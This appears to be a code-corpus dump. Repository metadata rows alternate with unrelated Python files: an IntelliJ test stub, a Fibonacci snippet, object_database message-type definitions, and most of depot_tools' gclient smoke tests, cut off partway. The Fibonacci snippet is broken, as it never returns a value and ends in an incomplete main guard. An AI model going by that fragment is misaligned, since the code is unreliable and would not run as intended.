] | 173 | 2018-07-05T13:59:39.000Z | 2018-08-09T01:12:03.000Z | python/testData/refactoring/pullup/fieldMove/SuperClass.py | Cyril-lamirand/intellij-community | 60ab6c61b82fc761dd68363eca7d9d69663cfa39 | [
"Apache-2.0"
] | 2 | 2020-03-15T08:57:37.000Z | 2020-04-07T04:48:14.000Z | class SuperClass(object):
pass | 16.5 | 25 | 0.757576 |
c2b36c0e034f97518c7fd39310faf4a9b39c3d0d | 355 | py | Python | fib.py | baduy9x/AlgorithmPractice | 9fb956aedf67c0515b66f2af93d8383dba697fec | [
"Apache-2.0"
] | null | null | null | fib.py | baduy9x/AlgorithmPractice | 9fb956aedf67c0515b66f2af93d8383dba697fec | [
"Apache-2.0"
] | null | null | null | fib.py | baduy9x/AlgorithmPractice | 9fb956aedf67c0515b66f2af93d8383dba697fec | [
"Apache-2.0"
] | null | null | null | class Solution(object):
def fib(self, n):
if n == 0 or n == 1:
return 1
if n == 2:
return 2
first = 1
second = 1
count = 0
while count <=n:
result = first + second
first = second
second = result
count += 1
if __name__ == __main__: | 22.1875 | 35 | 0.422535 |
9c2a7e9fa91a1e0923dbc8d2094e1425efdbeef1 | 9,500 | py | Python | object_database/messages.py | APrioriInvestments/object_database | d44b8432490b36b1ace67de0e23fb59f7ce9b529 | [
"Apache-2.0"
] | 2 | 2021-02-23T18:28:40.000Z | 2021-04-18T03:00:53.000Z | object_database/messages.py | APrioriInvestments/object_database | d44b8432490b36b1ace67de0e23fb59f7ce9b529 | [
"Apache-2.0"
] | 115 | 2019-10-08T18:32:58.000Z | 2021-02-12T20:16:14.000Z | object_database/messages.py | APrioriInvestments/object_database | d44b8432490b36b1ace67de0e23fb59f7ce9b529 | [
"Apache-2.0"
] | null | null | null | from typed_python import OneOf, Alternative, ConstDict, TupleOf, Tuple
from object_database.schema import (
SchemaDefinition,
ObjectId,
ObjectFieldId,
IndexId,
IndexValue,
FieldDefinition,
)
_heartbeatInterval = [5.0]
def setHeartbeatInterval(newInterval):
_heartbeatInterval[0] = newInterval
def getHeartbeatInterval():
return _heartbeatInterval[0]
def MessageToStr(msg):
fields = {}
if hasattr(msg, "schema"):
fields["schema"] = msg.schema
if hasattr(msg, "name"):
fields["name"] = msg.name
if hasattr(msg, "typename"):
fields["typename"] = msg.typename
if hasattr(msg, "transaction_id"):
fields["transaction_id"] = msg.transaction_id
if hasattr(msg, "writes"):
fields["writes"] = f"#{len(msg.writes)}"
if hasattr(msg, "set_adds"):
fields["set_adds"] = f"#{len(msg.set_adds)}"
if hasattr(msg, "set_removes"):
fields["set_removes"] = f"#{len(msg.set_removes)}"
if hasattr(msg, "mapping"):
fields["mapping"] = f"#{len(msg.mapping)}"
if hasattr(msg, "identities") and msg.identities:
fields["identities"] = f"#{len(msg.identities)}"
if hasattr(msg, "fieldname_and_value") and msg.fieldname_and_value is not None:
def clip(x):
stringified = repr(x)
if len(stringified) > 20:
stringified = stringified[:20] + stringified[0]
return stringified
fields[
"fieldname_and_value"
] = f"({msg.fieldname_and_value[0]}, {clip(msg.fieldname_and_value[1])})"
if hasattr(msg, "transaction_guid"):
fields["transaction_guid"] = f"{msg.transaction_guid}"
if hasattr(msg, "success"):
fields["success"] = f"{msg.success}"
if hasattr(msg, "values"):
fields["values"] = f"#{len(msg.values)}"
if hasattr(msg, "tid"):
fields["tid"] = msg.tid
if hasattr(msg, "index_values"):
fields["index_values"] = f"#{len(msg.index_values)}"
return type(msg).__name__ + "(" + ", ".join([f"{k}={v}" for k, v in fields.items()]) + ")"
ClientToServer = Alternative(
"ClientToServer",
# start a transaction. the 'transaction_guid' identifies the transaction
# within the stream (it's not actually global). The transaction consists of
# a set of writes to particular object and field ids
# as well as additions/removals of objects from indices.
# key_versions specifies the object/field ids that were read to produce
# this transaction, and which must not have changed for this transaction to be
# accepted, and 'index_versions' provides the same thing for the indices whose
# states we read.
# this can come in chunks, to prevent messages getting too large.
TransactionData={
"writes": ConstDict(ObjectFieldId, OneOf(None, bytes)),
"set_adds": ConstDict(IndexId, TupleOf(ObjectId)),
"set_removes": ConstDict(IndexId, TupleOf(ObjectId)),
"key_versions": TupleOf(ObjectFieldId),
"index_versions": TupleOf(IndexId),
"transaction_guid": int,
},
# indicate that a transaction is complete. 'as_of_version' specifies the
# transaction id that this was based off of.
CompleteTransaction={"as_of_version": int, "transaction_guid": int},
# sent periodically to keep the connection alive.
Heartbeat={},
# define a collection of types as we know them. The server will respond with
# a mapping indicating how each type and field is matched to a fieldId.
DefineSchema={"name": str, "definition": SchemaDefinition},
# indicate we want to load a particular object. The server will respond with a
# LazyLoadResponse providing the definition of the values.
LoadLazyObject={"schema": str, "typename": str, "identity": ObjectId},
# subscribe to a given type, and optionally, an index.
# the schema and typename define the class of object. note that you may get data
# for fields that you didn't define if somebody else has a broader definition of this
# type.
# the fieldname_and_value can be None, in which case this is a type-level subscription
# or it can provide the name of an index and the index value to which we are subscribed,
# in which case this is an index level subscription. For index-level subscriptions,
# we'll also receive a list of object ids that contain the objects we know about. This set
# will increase each time a value comes into our scope, and doesn't ever get smaller. The
# server will continue to send us updates on all the objects in our scope, and the view
# infrastructure is responsible for figuring out which objects to display.
# if 'isLazy', then this is a 'lazy' subscription, meaning we'll get any updates on this
# stream, but we won't get the values of the objects immediately (only their identities).
# we have to lazy-load the objects if we want to read from them and they haven't changed.
Subscribe={
"schema": str,
"typename": str,
# send us only the subset of objects that have IndexValue as the value
# the given field. The resulting response will contain this set of
# identities, and we'll get a SubscriptionIncrease message every time
# a new value gets added to our subscription
"fieldname_and_value": OneOf(None, Tuple(str, IndexValue)),
# load values when we first request them, instead of blocking on all the data.
"isLazy": bool,
},
# send a round-trip message to the server. The server will respond with a FlushResponse.
Flush={"guid": int},
# Authenticate the channel. This must be the first message.
Authenticate={"token": str},
# request a connection id that will be dependent on 'parentId' existing.
# this is used by proxies.
RequestDependentConnectionId={"parentId": ObjectId, "guid": str},
# indicate that a dependent connection id has died.
DropDependentConnectionId={"connIdentity": ObjectId},
# indicate that we may be getting new objects for this type
# even if we have not subscribed to any indices.
SubscribeNone={"schema": str, "typename": str},
__str__=MessageToStr,
)
ServerToClient = Alternative(
"ServerToClient",
# initialize the connection. transaction_num indicates the current transaction ID.
# connIdentity tells us what our own connectionObject's identity is. identity_root
# provides a block of object ids for us to allocate from.
Initialize={"transaction_num": int, "connIdentity": ObjectId, "identity_root": int},
# indicate whether a transaction was successful or not. If not, provide the reason
TransactionResult={
"transaction_guid": int,
"success": bool,
"badKey": OneOf(None, ObjectFieldId, IndexId, str),
},
# specify how each field in a schema is mapped.
SchemaMapping={"schema": str, "mapping": ConstDict(FieldDefinition, int)},
# respond to a Flush message
FlushResponse={"guid": int},
# respond with the data for a subscription request
SubscriptionData={
"schema": str,
"typename": OneOf(None, str),
"fieldname_and_value": OneOf(None, Tuple(str, IndexValue)),
"values": ConstDict(ObjectFieldId, OneOf(None, bytes)), # value
"index_values": ConstDict(ObjectFieldId, OneOf(None, IndexValue)),
"identities": OneOf(
None, TupleOf(ObjectId)
), # the identities in play if this is an index-level subscription
},
# sent by the server to clients before any transaction data on not-loaded lazy
# objects to ensure that they can correctly understand the set add/remove semantics
LazyTransactionPriors={"writes": ConstDict(ObjectFieldId, OneOf(None, bytes))},
# sent in response to the
LazyLoadResponse={
"identity": ObjectId,
"values": ConstDict(ObjectFieldId, OneOf(None, bytes)),
},
# sent in response to a lazy subscription, giving object identities
# and index membership, but not values themselves.
LazySubscriptionData={
"schema": str,
"typename": OneOf(None, str),
"fieldname_and_value": OneOf(None, Tuple(str, IndexValue)),
"identities": TupleOf(ObjectId),
"index_values": ConstDict(ObjectFieldId, OneOf(None, IndexValue)),
},
# indicate that a subscription has completed.
SubscriptionComplete={
"schema": str,
"typename": OneOf(None, str),
"fieldname_and_value": OneOf(None, Tuple(str, IndexValue)),
"tid": int, # marker transaction id
},
# indicate that a subscription is getting larger because an object
# has moved into our subscribed set.
SubscriptionIncrease={
"schema": str,
"typename": str,
"fieldname_and_value": Tuple(str, IndexValue),
"identities": TupleOf(ObjectId),
"transaction_id": int,
},
# we've been disconnected.
Disconnected={},
# receive some transaction data. We may not be subscribed to all fields
# in this transaction
Transaction={
"writes": ConstDict(ObjectFieldId, OneOf(None, bytes)),
"set_adds": ConstDict(IndexId, TupleOf(ObjectId)),
"set_removes": ConstDict(IndexId, TupleOf(ObjectId)),
"transaction_id": int,
},
# respond with a dependent connection id.
DependentConnectionId={"guid": str, "connIdentity": ObjectId, "identity_root": int},
__str__=MessageToStr,
)
| 41.85022 | 94 | 0.672737 |
046e2fe10a459fe976635d6f4a73a8af50b33f9b | 64,429 | py | Python | tests/gclient_smoketest.py | cybertk/depot_tools | 8ee6092bb79d18a82605d84dff2e64013a0c376c | [
"BSD-3-Clause"
] | 20 | 2015-12-07T06:08:27.000Z | 2021-11-08T11:06:18.000Z | tests/gclient_smoketest.py | cybertk/depot_tools | 8ee6092bb79d18a82605d84dff2e64013a0c376c | [
"BSD-3-Clause"
] | null | null | null | tests/gclient_smoketest.py | cybertk/depot_tools | 8ee6092bb79d18a82605d84dff2e64013a0c376c | [
"BSD-3-Clause"
] | 23 | 2015-05-05T08:22:59.000Z | 2021-11-10T06:24:46.000Z | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Smoke tests for gclient.py.
Shell out 'gclient' and run basic conformance tests.
This test assumes GClientSmokeBase.URL_BASE is valid.
"""
import logging
import os
import re
import subprocess
import sys
import unittest
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, ROOT_DIR)
from testing_support.fake_repos import join, write
from testing_support.fake_repos import FakeReposTestBase, FakeRepoTransitive, \
FakeRepoSkiaDEPS
import gclient_utils
import scm as gclient_scm
import subprocess2
GCLIENT_PATH = os.path.join(ROOT_DIR, 'gclient')
COVERAGE = False
class GClientSmokeBase(FakeReposTestBase):
def setUp(self):
super(GClientSmokeBase, self).setUp()
# Make sure it doesn't try to auto update when testing!
self.env = os.environ.copy()
self.env['DEPOT_TOOLS_UPDATE'] = '0'
def gclient(self, cmd, cwd=None):
if not cwd:
cwd = self.root_dir
if COVERAGE:
# Don't use the wrapper script.
cmd_base = ['coverage', 'run', '-a', GCLIENT_PATH + '.py']
else:
cmd_base = [GCLIENT_PATH]
cmd = cmd_base + cmd
process = subprocess.Popen(cmd, cwd=cwd, env=self.env,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=sys.platform.startswith('win'))
(stdout, stderr) = process.communicate()
logging.debug("XXX: %s\n%s\nXXX" % (' '.join(cmd), stdout))
logging.debug("YYY: %s\n%s\nYYY" % (' '.join(cmd), stderr))
# pylint: disable=E1103
return (stdout.replace('\r\n', '\n'), stderr.replace('\r\n', '\n'),
process.returncode)
def untangle(self, stdout):
tasks = {}
remaining = []
for line in stdout.splitlines(False):
m = re.match(r'^(\d)+>(.*)$', line)
if not m:
remaining.append(line)
else:
self.assertEquals([], remaining)
tasks.setdefault(int(m.group(1)), []).append(m.group(2))
out = []
for key in sorted(tasks.iterkeys()):
out.extend(tasks[key])
out.extend(remaining)
return '\n'.join(out)
def parseGclient(self, cmd, items, expected_stderr='', untangle=False):
"""Parse gclient's output to make it easier to test.
If untangle is True, tries to sort out the output from parallel checkout."""
(stdout, stderr, returncode) = self.gclient(cmd)
if untangle:
stdout = self.untangle(stdout)
self.checkString(expected_stderr, stderr)
self.assertEquals(0, returncode)
return self.checkBlock(stdout, items)
def splitBlock(self, stdout):
"""Split gclient's output into logical execution blocks.
___ running 'foo' at '/bar'
(...)
___ running 'baz' at '/bar'
(...)
will result in 2 items of len((...).splitlines()) each.
"""
results = []
for line in stdout.splitlines(False):
# Intentionally skips empty lines.
if not line:
continue
if line.startswith('__'):
match = re.match(r'^________ ([a-z]+) \'(.*)\' in \'(.*)\'$', line)
if not match:
match = re.match(r'^_____ (.*) is missing, synching instead$', line)
if match:
# Blah, it's when a dependency is deleted, we should probably not
# output this message.
results.append([line])
elif (
not re.match(
r'_____ [^ ]+ : Attempting rebase onto [0-9a-f]+...',
line) and
not re.match(r'_____ [^ ]+ at [^ ]+', line)):
# The two regexp above are a bit too broad, they are necessary only
# for git checkouts.
self.fail(line)
else:
results.append([[match.group(1), match.group(2), match.group(3)]])
else:
if not results:
# TODO(maruel): gclient's git stdout is inconsistent.
# This should fail the test instead!!
pass
else:
results[-1].append(line)
return results
def checkBlock(self, stdout, items):
results = self.splitBlock(stdout)
for i in xrange(min(len(results), len(items))):
if isinstance(items[i], (list, tuple)):
verb = items[i][0]
path = items[i][1]
else:
verb = items[i]
path = self.root_dir
self.checkString(results[i][0][0], verb, (i, results[i][0][0], verb))
if sys.platform == 'win32':
# Make path lower case since casing can change randomly.
self.checkString(
results[i][0][2].lower(),
path.lower(),
(i, results[i][0][2].lower(), path.lower()))
else:
self.checkString(results[i][0][2], path, (i, results[i][0][2], path))
self.assertEquals(len(results), len(items), (stdout, items, len(results)))
return results
@staticmethod
def svnBlockCleanup(out):
"""Work around svn status difference between svn 1.5 and svn 1.6
I don't know why but on Windows they are reversed. So sorts the items."""
for i in xrange(len(out)):
if len(out[i]) < 2:
continue
out[i] = [out[i][0]] + sorted([x[1:].strip() for x in out[i][1:]])
return out
class GClientSmoke(GClientSmokeBase):
"""Doesn't require either svnserve nor git-daemon."""
@property
def svn_base(self):
return 'svn://random.server/svn/'
@property
def git_base(self):
return 'git://random.server/git/'
def testHelp(self):
"""testHelp: make sure no new command was added."""
result = self.gclient(['help'])
# Roughly, not too short, not too long.
self.assertTrue(1000 < len(result[0]) and len(result[0]) < 2300,
'Too much written to stdout: %d bytes' % len(result[0]))
self.assertEquals(0, len(result[1]))
self.assertEquals(0, result[2])
def testUnknown(self):
result = self.gclient(['foo'])
# Roughly, not too short, not too long.
self.assertTrue(1000 < len(result[0]) and len(result[0]) < 2300,
'Too much written to stdout: %d bytes' % len(result[0]))
self.assertEquals(0, len(result[1]))
self.assertEquals(0, result[2])
def testNotConfigured(self):
res = ('', 'Error: client not configured; see \'gclient config\'\n', 1)
self.check(res, self.gclient(['cleanup']))
self.check(res, self.gclient(['diff']))
self.check(res, self.gclient(['pack']))
self.check(res, self.gclient(['revert']))
self.check(res, self.gclient(['revinfo']))
self.check(res, self.gclient(['runhooks']))
self.check(res, self.gclient(['status']))
self.check(res, self.gclient(['sync']))
self.check(res, self.gclient(['update']))
def testConfig(self):
p = join(self.root_dir, '.gclient')
def test(cmd, expected):
if os.path.exists(p):
os.remove(p)
results = self.gclient(cmd)
self.check(('', '', 0), results)
self.checkString(expected, open(p, 'rU').read())
test(['config', self.svn_base + 'trunk/src/'],
('solutions = [\n'
' { "name" : "src",\n'
' "url" : "%strunk/src",\n'
' "deps_file" : "DEPS",\n'
' "managed" : True,\n'
' "custom_deps" : {\n'
' },\n'
' "safesync_url": "",\n'
' },\n'
']\n'
'cache_dir = None\n') % self.svn_base)
test(['config', self.git_base + 'repo_1', '--name', 'src'],
('solutions = [\n'
' { "name" : "src",\n'
' "url" : "%srepo_1",\n'
' "deps_file" : "DEPS",\n'
' "managed" : True,\n'
' "custom_deps" : {\n'
' },\n'
' "safesync_url": "",\n'
' },\n'
']\n'
'cache_dir = None\n') % self.git_base)
test(['config', 'foo', 'faa'],
'solutions = [\n'
' { "name" : "foo",\n'
' "url" : "foo",\n'
' "deps_file" : "DEPS",\n'
' "managed" : True,\n'
' "custom_deps" : {\n'
' },\n'
' "safesync_url": "faa",\n'
' },\n'
']\n'
'cache_dir = None\n')
test(['config', 'foo', '--deps', 'blah'],
'solutions = [\n'
' { "name" : "foo",\n'
' "url" : "foo",\n'
' "deps_file" : "blah",\n'
' "managed" : True,\n'
' "custom_deps" : {\n'
' },\n'
' "safesync_url": "",\n'
' },\n'
']\n'
'cache_dir = None\n')
test(['config', '--spec', '["blah blah"]'], '["blah blah"]')
os.remove(p)
results = self.gclient(['config', 'foo', 'faa', 'fuu'])
err = ('Usage: gclient.py config [options] [url] [safesync url]\n\n'
'gclient.py: error: Inconsistent arguments. Use either --spec or one'
' or 2 args\n')
self.check(('', err, 2), results)
self.assertFalse(os.path.exists(join(self.root_dir, '.gclient')))
def testSolutionNone(self):
results = self.gclient(['config', '--spec',
'solutions=[{"name": "./", "url": None}]'])
self.check(('', '', 0), results)
results = self.gclient(['sync'])
self.check(('', '', 0), results)
self.assertTree({})
results = self.gclient(['revinfo'])
self.check(('./: None\n', '', 0), results)
self.check(('', '', 0), self.gclient(['cleanup']))
self.check(('', '', 0), self.gclient(['diff']))
self.assertTree({})
self.check(('', '', 0), self.gclient(['pack']))
self.check(('', '', 0), self.gclient(['revert']))
self.assertTree({})
self.check(('', '', 0), self.gclient(['runhooks']))
self.assertTree({})
self.check(('', '', 0), self.gclient(['status']))
def testDifferentTopLevelDirectory(self):
# Check that even if the .gclient file does not mention the directory src
# itself, but it is included via dependencies, the .gclient file is used.
self.gclient(['config', self.svn_base + 'trunk/src.DEPS'])
deps = join(self.root_dir, 'src.DEPS')
os.mkdir(deps)
write(join(deps, 'DEPS'),
'deps = { "src": "%strunk/src" }' % (self.svn_base))
src = join(self.root_dir, 'src')
os.mkdir(src)
res = self.gclient(['status', '--jobs', '1'], src)
self.checkBlock(res[0], [('running', deps), ('running', src)])
class GClientSmokeSVN(GClientSmokeBase):
def setUp(self):
super(GClientSmokeSVN, self).setUp()
self.enabled = self.FAKE_REPOS.set_up_svn()
def testSync(self):
# TODO(maruel): safesync.
if not self.enabled:
return
self.gclient(['config', self.svn_base + 'trunk/src/'])
# Test unversioned checkout.
self.parseGclient(['sync', '--deps', 'mac', '--jobs', '1'],
['running', 'running',
# This is due to the way svn update is called for a
# single file when File() is used in a DEPS file.
('running', os.path.join(self.root_dir, 'src', 'file', 'other')),
'running', 'running', 'running', 'running'])
tree = self.mangle_svn_tree(
('trunk/src@2', 'src'),
('trunk/third_party/foo@1', 'src/third_party/foo'),
('trunk/other@2', 'src/other'))
tree['src/file/other/DEPS'] = (
self.FAKE_REPOS.svn_revs[2]['trunk/other/DEPS'])
tree['src/svn_hooked1'] = 'svn_hooked1'
self.assertTree(tree)
# Manually remove svn_hooked1 before synching to make sure it's not
# recreated.
os.remove(join(self.root_dir, 'src', 'svn_hooked1'))
# Test incremental versioned sync: sync backward.
self.parseGclient(
['sync', '--revision', 'src@1', '--deps', 'mac',
'--delete_unversioned_trees', '--jobs', '1'],
['running', 'running', 'running', 'running', 'deleting'])
tree = self.mangle_svn_tree(
('trunk/src@1', 'src'),
('trunk/third_party/foo@2', 'src/third_party/fpp'),
('trunk/other@1', 'src/other'),
('trunk/third_party/foo@2', 'src/third_party/prout'))
tree['src/file/other/DEPS'] = (
self.FAKE_REPOS.svn_revs[2]['trunk/other/DEPS'])
self.assertTree(tree)
# Test incremental sync: delete-unversioned_trees isn't there.
self.parseGclient(['sync', '--deps', 'mac', '--jobs', '1'],
['running', 'running', 'running', 'running', 'running'])
tree = self.mangle_svn_tree(
('trunk/src@2', 'src'),
('trunk/third_party/foo@2', 'src/third_party/fpp'),
('trunk/third_party/foo@1', 'src/third_party/foo'),
('trunk/other@2', 'src/other'),
('trunk/third_party/foo@2', 'src/third_party/prout'))
tree['src/file/other/DEPS'] = (
self.FAKE_REPOS.svn_revs[2]['trunk/other/DEPS'])
tree['src/svn_hooked1'] = 'svn_hooked1'
self.assertTree(tree)
def testSyncIgnoredSolutionName(self):
"""TODO(maruel): This will become an error soon."""
if not self.enabled:
return
self.gclient(['config', self.svn_base + 'trunk/src/'])
results = self.gclient(
['sync', '--deps', 'mac', '-r', 'invalid@1', '--jobs', '1'])
self.checkBlock(results[0], [
'running', 'running',
# This is due to the way svn update is called for a single file when
# File() is used in a DEPS file.
('running', os.path.join(self.root_dir, 'src', 'file', 'other')),
'running', 'running', 'running', 'running'])
self.checkString('Please fix your script, having invalid --revision flags '
'will soon considered an error.\n', results[1])
self.assertEquals(0, results[2])
tree = self.mangle_svn_tree(
('trunk/src@2', 'src'),
('trunk/third_party/foo@1', 'src/third_party/foo'),
('trunk/other@2', 'src/other'))
tree['src/file/other/DEPS'] = (
self.FAKE_REPOS.svn_revs[2]['trunk/other/DEPS'])
tree['src/svn_hooked1'] = 'svn_hooked1'
self.assertTree(tree)
def testSyncNoSolutionName(self):
# When no solution name is provided, gclient uses the first solution listed.
if not self.enabled:
return
self.gclient(['config', self.svn_base + 'trunk/src/'])
self.parseGclient(['sync', '--deps', 'mac', '-r', '1', '--jobs', '1'],
['running', 'running', 'running', 'running'])
tree = self.mangle_svn_tree(
('trunk/src@1', 'src'),
('trunk/third_party/foo@2', 'src/third_party/fpp'),
('trunk/other@1', 'src/other'),
('trunk/third_party/foo@2', 'src/third_party/prout'))
self.assertTree(tree)
def testSyncJobs(self):
if not self.enabled:
return
# TODO(maruel): safesync.
self.gclient(['config', self.svn_base + 'trunk/src/'])
# Test unversioned checkout.
# Use --jobs 1 otherwise the order is not deterministic.
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '1'],
[
'running',
'running',
# This is due to the way svn update is called for a
# single file when File() is used in a DEPS file.
('running', os.path.join(self.root_dir, 'src', 'file', 'other')),
'running',
'running',
'running',
'running',
],
untangle=True)
tree = self.mangle_svn_tree(
('trunk/src@2', 'src'),
('trunk/third_party/foo@1', 'src/third_party/foo'),
('trunk/other@2', 'src/other'))
tree['src/file/other/DEPS'] = (
self.FAKE_REPOS.svn_revs[2]['trunk/other/DEPS'])
tree['src/svn_hooked1'] = 'svn_hooked1'
self.assertTree(tree)
# Manually remove svn_hooked1 before synching to make sure it's not
# recreated.
os.remove(join(self.root_dir, 'src', 'svn_hooked1'))
# Test incremental versioned sync: sync backward.
self.parseGclient(
['sync', '--revision', 'src@1', '--deps', 'mac',
'--delete_unversioned_trees', '--jobs', '8'],
['running', 'running', 'running', 'running', 'deleting'],
untangle=True)
tree = self.mangle_svn_tree(
('trunk/src@1', 'src'),
('trunk/third_party/foo@2', 'src/third_party/fpp'),
('trunk/other@1', 'src/other'),
('trunk/third_party/foo@2', 'src/third_party/prout'))
tree['src/file/other/DEPS'] = (
self.FAKE_REPOS.svn_revs[2]['trunk/other/DEPS'])
self.assertTree(tree)
# Test incremental sync: delete-unversioned_trees isn't there.
self.parseGclient(['sync', '--deps', 'mac', '--jobs', '8'],
['running', 'running', 'running', 'running', 'running'],
untangle=True)
tree = self.mangle_svn_tree(
('trunk/src@2', 'src'),
('trunk/third_party/foo@2', 'src/third_party/fpp'),
('trunk/third_party/foo@1', 'src/third_party/foo'),
('trunk/other@2', 'src/other'),
('trunk/third_party/foo@2', 'src/third_party/prout'))
tree['src/file/other/DEPS'] = (
self.FAKE_REPOS.svn_revs[2]['trunk/other/DEPS'])
tree['src/svn_hooked1'] = 'svn_hooked1'
self.assertTree(tree)
def testSyncCustomDeps(self):
if not self.enabled:
return
out = (
'solutions = [\n'
' { "name" : "src",\n'
' "url" : "%(base)s/src",\n'
' "custom_deps" : {\n'
# Remove 2 deps, change 1, add 1.
' "src/other": None,\n'
' "src/third_party/foo": \'%(base)s/third_party/prout\',\n'
' "src/file/other": None,\n'
' "new_deps": "/trunk/src/third_party",\n'
' },\n'
' "safesync_url": "",\n'
' },\n'
']\n\n' %
{ 'base': self.svn_base + 'trunk' })
fileobj = open(os.path.join(self.root_dir, '.gclient'), 'w')
fileobj.write(out)
fileobj.close()
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '1'],
['running', 'running', 'running', 'running'],
untangle=True)
tree = self.mangle_svn_tree(
('trunk/src@2', 'src'),
('trunk/third_party/prout@2', 'src/third_party/foo'),
('trunk/src/third_party@2', 'new_deps'))
tree['src/svn_hooked1'] = 'svn_hooked1'
self.assertTree(tree)
def testSyncCustomDepsNoDeps(self):
if not self.enabled:
return
out = (
'solutions = [\n'
# This directory has no DEPS file.
' { "name" : "src/third_party",\n'
' "url" : "%(base)s/src/third_party",\n'
' "custom_deps" : {\n'
# Add 1.
' "src/other": \'/trunk/other\',\n'
' },\n'
' "safesync_url": "",\n'
' },\n'
']\n\n' %
{ 'base': self.svn_base + 'trunk' })
fileobj = open(os.path.join(self.root_dir, '.gclient'), 'w')
fileobj.write(out)
fileobj.close()
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '1'],
['running', 'running'],
untangle=True)
tree = self.mangle_svn_tree(
('trunk/src/third_party@2', 'src/third_party'),
('trunk/other@2', 'src/other'))
self.assertTree(tree)
def testRevertAndStatus(self):
if not self.enabled:
return
self.gclient(['config', self.svn_base + 'trunk/src/'])
# Tested in testSync.
self.gclient(['sync', '--deps', 'mac'])
write(join(self.root_dir, 'src', 'other', 'hi'), 'Hey!')
out = self.parseGclient(['status', '--deps', 'mac', '--jobs', '1'],
[['running', join(self.root_dir, 'src')],
['running', join(self.root_dir, 'src', 'other')]])
out = self.svnBlockCleanup(out)
self.checkString('file', out[0][1])
self.checkString('other', out[0][2])
self.checkString('svn_hooked1', out[0][3])
self.checkString(join('third_party', 'foo'), out[0][4])
self.checkString('hi', out[1][1])
self.assertEquals(5, len(out[0]))
self.assertEquals(2, len(out[1]))
# Revert implies --force implies running hooks without looking at pattern
# matching.
results = self.gclient(['revert', '--deps', 'mac', '--jobs', '1'])
out = self.splitBlock(results[0])
# src, src/other is missing, src/other, src/third_party/foo is missing,
# src/third_party/foo, 2 svn hooks, 3 related to File().
self.assertEquals( 8, len(out))
self.checkString('', results[1])
self.assertEquals(0, results[2])
tree = self.mangle_svn_tree(
('trunk/src@2', 'src'),
('trunk/third_party/foo@1', 'src/third_party/foo'),
('trunk/other@2', 'src/other'))
tree['src/file/other/DEPS'] = (
self.FAKE_REPOS.svn_revs[2]['trunk/other/DEPS'])
tree['src/svn_hooked1'] = 'svn_hooked1'
tree['src/svn_hooked2'] = 'svn_hooked2'
self.assertTree(tree)
out = self.parseGclient(['status', '--deps', 'mac', '--jobs', '1'],
[['running', join(self.root_dir, 'src')]])
out = self.svnBlockCleanup(out)
self.checkString('file', out[0][1])
self.checkString('other', out[0][2])
self.checkString('svn_hooked1', out[0][3])
self.checkString('svn_hooked2', out[0][4])
self.checkString(join('third_party', 'foo'), out[0][5])
self.assertEquals(6, len(out[0]))
self.assertEquals(1, len(out))
def testRevertAndStatusDepsOs(self):
if not self.enabled:
return
self.gclient(['config', self.svn_base + 'trunk/src/'])
# Tested in testSync.
self.gclient(['sync', '--deps', 'mac', '--revision', 'src@1'])
write(join(self.root_dir, 'src', 'other', 'hi'), 'Hey!')
# Without --verbose, gclient won't output the directories without
# modification.
out = self.parseGclient(['status', '--deps', 'mac', '--jobs', '1'],
[['running', join(self.root_dir, 'src')],
['running', join(self.root_dir, 'src', 'other')]])
out = self.svnBlockCleanup(out)
self.checkString('other', out[0][1])
self.checkString(join('third_party', 'fpp'), out[0][2])
self.checkString(join('third_party', 'prout'), out[0][3])
self.checkString('hi', out[1][1])
self.assertEquals(4, len(out[0]))
self.assertEquals(2, len(out[1]))
# So verify it works with --verbose.
out = self.parseGclient(
['status', '--deps', 'mac', '--verbose', '--jobs', '1'],
[['running', join(self.root_dir, 'src')],
['running', join(self.root_dir, 'src', 'other')],
['running', join(self.root_dir, 'src', 'third_party', 'fpp')],
['running', join(self.root_dir, 'src', 'third_party', 'prout')]])
out = self.svnBlockCleanup(out)
self.checkString('other', out[0][5])
self.checkString(join('third_party', 'fpp'), out[0][7])
self.checkString(join('third_party', 'prout'), out[0][8])
self.checkString('hi', out[1][5])
self.assertEquals(9, len(out[0]))
self.assertEquals(7, len(out[1]))
self.assertEquals(6, len(out[2]))
self.assertEquals(6, len(out[3]))
self.assertEquals(4, len(out))
# Revert implies --force implies running hooks without looking at pattern
# matching.
# TODO(maruel): In general, gclient revert output is wrong. It should output
# the file list after some ___ running 'svn status'
results = self.gclient(['revert', '--deps', 'mac', '--jobs', '1'])
out = self.splitBlock(results[0])
self.assertEquals(4, len(out))
self.checkString('', results[1])
self.assertEquals(0, results[2])
tree = self.mangle_svn_tree(
('trunk/src@1', 'src'),
('trunk/third_party/foo@2', 'src/third_party/fpp'),
('trunk/other@1', 'src/other'),
('trunk/third_party/prout@2', 'src/third_party/prout'))
self.assertTree(tree)
out = self.parseGclient(['status', '--deps', 'mac', '--jobs', '1'],
[['running', join(self.root_dir, 'src')]])
out = self.svnBlockCleanup(out)
self.checkString('other', out[0][1])
self.checkString(join('third_party', 'fpp'), out[0][2])
self.checkString(join('third_party', 'prout'), out[0][3])
self.assertEquals(4, len(out[0]))
def testRunHooks(self):
if not self.enabled:
return
self.gclient(['config', self.svn_base + 'trunk/src/'])
self.gclient(['sync', '--deps', 'mac'])
out = self.parseGclient(['runhooks', '--deps', 'mac'],
['running', 'running'])
self.checkString(1, len(out[0]))
self.checkString(1, len(out[1]))
def testRunHooksDepsOs(self):
if not self.enabled:
return
self.gclient(['config', self.svn_base + 'trunk/src/'])
self.gclient(['sync', '--deps', 'mac', '--revision', 'src@1'])
out = self.parseGclient(['runhooks', '--deps', 'mac'], [])
self.assertEquals([], out)
def testRevInfo(self):
if not self.enabled:
return
self.gclient(['config', self.svn_base + 'trunk/src/'])
self.gclient(['sync', '--deps', 'mac'])
results = self.gclient(['revinfo', '--deps', 'mac'])
out = ('src: %(base)s/src\n'
'src/file/other: File("%(base)s/other/DEPS")\n'
'src/other: %(base)s/other\n'
'src/third_party/foo: %(base)s/third_party/foo@1\n' %
{ 'base': self.svn_base + 'trunk' })
self.check((out, '', 0), results)
results = self.gclient(['revinfo', '--deps', 'mac', '--actual'])
out = ('src: %(base)s/src@2\n'
'src/file/other: %(base)s/other/DEPS@2\n'
'src/other: %(base)s/other@2\n'
